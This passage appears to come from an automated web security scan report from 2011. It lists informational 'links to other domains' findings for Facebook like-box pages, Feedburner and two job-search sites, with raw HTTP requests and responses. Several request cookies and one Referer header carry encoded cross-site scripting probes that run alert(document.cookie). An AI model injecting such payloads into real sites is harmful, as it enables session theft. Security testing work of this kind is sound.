HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Pragma: no-cache
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:40 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:40 GMT;path=/
Content-Length: 212247


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="https://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

14.6. http://www.facebook.com/BMWUSA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /BMWUSA

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /BMWUSA?v=app_4949752878 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=85x21; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=T_nuM; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 19:52:03 GMT
Content-Length: 37296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/oPbBLZNMjVJ.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="alternate" type="application/rss+xml" title="BMW USA" href="/feeds/page.php?format=atom10&amp;id=309506851302"/>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

14.7. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http%3A%2F%2Fweekendedition.news.yahoo.com&layout=button_count&show_faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/nm/us_bankofamerica;_ylt=AlohsBp579RpJ1eBqn0kxP.s0NUE;_ylu=X3oDMTNobm1hMzM5BGFzc2V0A25tLzIwMTEwMTIxL3VzX2JhbmtvZmFtZXJpY2EEY2NvZGUDbW9zdHBvcHVsYXIEY3BvcwMzBHBvcwMxMQRwdANob21lX2Nva2UEc2VjA3luX3RvcF9zdG9yeQRzbGsDYmFua29mYW1lcmlj
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtheclicker.todayshow.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Ftheclicker.todayshow.com%252F%253F28d8a%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E1b20a3de4c0%253D1%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Fri, 21 Jan 2011 18:19:10 GMT
Content-Length: 8036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yU/r/jKqmG9e3p5H.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

14.8. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.jdjournal.com%2F&layout=standard&show_faces=true&width=450&action=like&font=arial&colorscheme=light&height=80 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=85x21; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 19:34:32 GMT
Content-Length: 10071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://d.static.ak.fbcdn.net/rsrc.php/yV/r/u2XEW2M3uCu.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

14.9. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FJD2B%2F298408284363&width=557&colorscheme=light&connections=100&stream=true&header=true&height=557 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:24 GMT
Content-Length: 13851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yo/r/wqv1o-EUF6N.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yf/r/Pp-oQmFcGTc.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/pages/JD2B/298408284363" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50291_298408284363_7854726_q.jpg" alt="JD2B" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="loader img" src="http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/EmploymentXing" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs846.snc4/70762_1020382471_2571211_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000786097800" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs268.snc3/23105_100000786097800_5420_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000833895090" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1383263125" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/piyush.v.bhatt" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs328.snc4/41514_1210926416_5111923_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://e.static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

14.10. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http://www.facebook.com/pages/JD2B/298408284363&width=557&colorscheme=light&connections=100&stream=true&header=true&height=557 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.jd2b.com/?f05bd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf651820abc=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS; wd=308x80

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Fri, 21 Jan 2011 19:39:58 GMT
Content-Length: 13489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/ys/r/IlU90aRP2xg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yV/r/R3HqmS9o_VJ.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yL/r/xmHI_BAWBjI.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/pages/JD2B/298408284363" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50291_298408284363_7854726_q.jpg" alt="JD2B" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="loader img" src="http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000786097800" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs268.snc3/23105_100000786097800_5420_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000833895090" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/EmploymentXing" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs846.snc4/70762_1020382471_2571211_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/piyush.v.bhatt" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs328.snc4/41514_1210926416_5111923_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1383263125" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

14.11. http://www.feedburner.com/fb/a/emailverifySubmit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.feedburner.com
Path:   /fb/a/emailverifySubmit

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /fb/a/emailverifySubmit?feedId= HTTP/1.1
Host: www.feedburner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://feedburner.google.com/fb/a/legacysubscribe
Date: Fri, 21 Jan 2011 19:34:50 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: S=feedburner-control-panel=Xid4qVXoZ7IXqezDQPe2_A; Path=/; HttpOnly
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="http://feedburner.google.com/fb/a/legacysubscribe">here</A>
...[SNIP]...

14.12. http://www.hound.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hound.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=125x125\ HTTP/1.1
Host: www.hound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=a827dr0sigiku3i02l6760rfb1; path=/; domain=hound.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: country=United+States; expires=Sun, 20-Feb-2011 19:34:57 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 121008


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>The Largest Online Job Search Engine | Jobs from Employers | Hound.com</ti
...[SNIP]...
<br><a href="http://twitter.com/aharrisonbarnes" target="_blank"><img src="http://images.hound.com/new/twitter_followme.jpg" border="0" vspace="3" alt="Follow Me on Twitter" title="Follow Me on Twitter">
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/' rel='bookmark' title='Permanent Link: Do Not Stop Seeing Opportunity: Step Outside Your Mind...s Comfort Zone and Begin to Dream'>Do Not Stop Seeing Opportunity: Step Outside Your Mind...s Comfort Zone and Begin to Dream</a>
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/' rel='bookmark' title='Permanent Link: Push Yourself Outside Your Comfort Zone'>Push Yourself Outside Your Comfort Zone</a>
...[SNIP]...
<br style="line-height:10px;">
<script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<li>
<a href="http://www.employmentspectator.com/" target="_blank"><img src="http://images.hound.com/new/logo_employmentspectator1.gif" border="0" alt="Employment News Blog" title="Employment News Blog" align="right" style="margin-left:5px;">
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=afc72c08&amp;cb=562547' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=370&amp;n=afc72c08&amp;' border='0' alt='' /></a>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=af9eda74&amp;cb=965659' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=364&amp;n=af9eda74&amp;' border='0' alt='' /></a>
...[SNIP]...
<td align="center">
<iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FHoundcom-Fan-Page%2F306053987750&amp;width=180&amp;colorscheme=light&amp;connections=100&amp;stream=true&amp;header=true&amp;height=610" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:180px; height:610px;" allowTransparency="true"></iframe>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a4307d91&amp;cb=554525' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=380&amp;n=a4307d91&amp' border='0' alt='' /></a>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a661161a&amp;cb=235269' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=371&amp;n=a661161a&amp;' border='0' alt='' /></a>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a3204923&amp;cb=562589' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=322&amp;n=a3204923&amp;' border='0' alt='' /></a>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a833910f&amp;cb=745457' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=291&amp;n=a833910f&amp;' border='0' alt='' /></a>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src="http://srvr12.pdcsrvr.com/media/www/empsc/f1.js"></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a05799fd&amp;cb=112247' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=220&amp;n=a05799fd' border='0' alt='' /></a>
...[SNIP]...
<td align="left"><a href="http://www.facebook.com/pages/Houndcom-Fan-Page/306053987750" target="_blank"><img src="http://images.hound.com/new/facebook.jpg" border="0" alt="Facebook" title="Facebook">
...[SNIP]...
<td align="left"><a href="http://twitter.com/Hound_jobsearch" target="_blank"><img src="http://images.hound.com/new/twitter.jpg" border="0" alt="Twitter" title="Twitter">
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a href="http://www.preferredresumes.com/" target="_blank">Resume Writing Service</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a href="http://www.resumeboomer.com/" target="_blank">Post Resume</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a href="http://www.recruitersubmitter.com/" target="_blank">Send Resume</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a href="http://www.employmentauthority.com/" target="_blank">Resume Distribution</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a href="http://www.aharrisonbarnes.com/" target="_blank">Career Advice</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a href="http://www.aharrisonbarnes.com/hb-course/" target="_blank">Job Search Tips</a>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a href="http://www.bcgsearch.com/" target="_blank">Legal Recruiter</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a href="http://www.attorneyresume.com/" target="_blank">Legal Resume Writing</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a href="http://www.legalauthority.com/" target="_blank">Targeted Mailing</a>
...[SNIP]...
<center><a href="http://www.employmentresearchinstitute.com/" target="_blank"><img src="http://images.hound.com/new/logo_eri.jpg" width="160" height="45" border="0" alt="Employment Research Institute" title="Employment Research Institute">
...[SNIP]...
<!-- GOOGLE ANALYTICS START -->    
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

14.13. http://www.lawcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=leverage-300x250\ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gs1oh9i6kad359a0jna6e84qs7; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 211139

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a16c4656&amp;cb=558459' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=165&amp;n=a16c4656&amp;' border='0' alt='' /></a>
...[SNIP]...
<td align="right" class="articletitle"><a href="http://employers.employmentcrossing.com/?compid=2" style="color:#3d7e18;"><strong>
...[SNIP]...
<td width="120" class="imgtext" style="padding-left:0px;" valign="top">
<img src="http://images.employmentcrossing.com/employment/articleimages/harrison_small.jpg" width="109" height="123" border="0" class="articleimg" alt="Our CEO A Harrison Barnes" title="Our CEO A Harrison Barnes">
<br>
...[SNIP]...
<br>
<a href="http://twitter.com/aharrisonbarnes" target="_blank"><img src="http://www.lawcrossing.com/images/twitter_followme.jpg" border="0" alt="Follow Me on Twitter" title="Follow Me on Twitter">
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/' rel='bookmark' title='Permanent Link: Do Not Stop Seeing Opportunity: Step Outside Your Mind...s Comfort Zone and Begin to Dream'>Do Not Stop Seeing Opportunity: Step Outside Your Mind...s Comfort Zone and Begin to Dream</a>
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/' rel='bookmark' title='Permanent Link: Push Yourself Outside Your Comfort Zone'>Push Yourself Outside Your Comfort Zone</a>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<td width="100" valign="top"><a href="http://www.jdjournal.com" target="_blank"><img src="http://www.lawcrossing.com/images/articleimages/jdjournallogo_sm.jpg" width="89" height="21" border="0" class="articleimg" alt="JD Journal">
...[SNIP]...
<br><a href="http://www.jdjournal.com" target="_blank"><img src="http://www.lawcrossing.com/images/articleimages/jdjournallogo_sm.jpg" width="89" height="21" border="0" class="articleimg" alt="JD Journal" title="JD Journal">
...[SNIP]...
<td width="100" valign="top" class="imgtext"><a href="http://www.bcgsearch.com/" target="_blank"><img src="http://www.lawcrossing.com/images/articleimages/bcglogo_sm.jpg" width="84" height="48" border="0" class="articleimg" alt="BCG Attorney Search" title="BCG Attorney Search">
...[SNIP]...
